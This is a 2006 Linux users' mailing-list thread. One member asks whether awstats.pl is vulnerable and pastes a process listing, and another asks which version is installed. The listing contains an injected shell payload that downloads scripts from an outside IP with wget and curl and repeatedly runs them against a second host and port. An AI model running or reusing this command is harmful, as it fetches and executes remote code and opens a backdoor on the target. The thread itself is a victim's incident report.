On 5/8/06, Kelsey Hartigan Go <[EMAIL PROTECTED]> wrote:
Any vulnerability in awstats.pl?
I suddenly have these processes running...
6086 ? S 0:00 /usr/bin/perl /var/www/cgi-bin/awstats.pl
6087 ? R 81:06 sh -c echo ;echo b_exp;wget
http://219.84.105.36/ping
.txt;mv ping.txt temp2006;perl temp2006 220.227.100.4 3303;wget
http://219.84.10
5.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o ping
http://219.84.105
.36/ping;chmod +x ping;./ping 220.227.100.4 3303;cd /tmp/;curl -o temp2006
http:
//219.84.105.36/ping.txt;while [ 1 ];do perl temp2006 220.227.100.4
3303;done;wg
et http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;curl -o
pin
g http://219.84.105.36/ping;chmod +x ping;./ping 220.227.100.4 3303;echo
e_exp;%
00/awstats.w.x.y.z.conf
What version of awstats are you running?
I'm running the latest one on our server but i haven't encountered
anything similar to your processes.
Even before I set up anything on the server (only Apache running),
there were already some IPs attempting to exploit the system via a
vulnerability in awstats (as well as in horde, xml/rpc, drupal, etc.)
--
Stand before it and there is no beginning.
Follow it and there is no end.
Stay with the ancient Tao,
Move with the present.
_________________________________________________
Philippine Linux Users' Group (PLUG) Mailing List
[email protected] (#PLUG @ irc.free.net.ph)
Read the Guidelines: http://linux.org.ph/lists
Searchable Archives: http://archives.free.net.ph
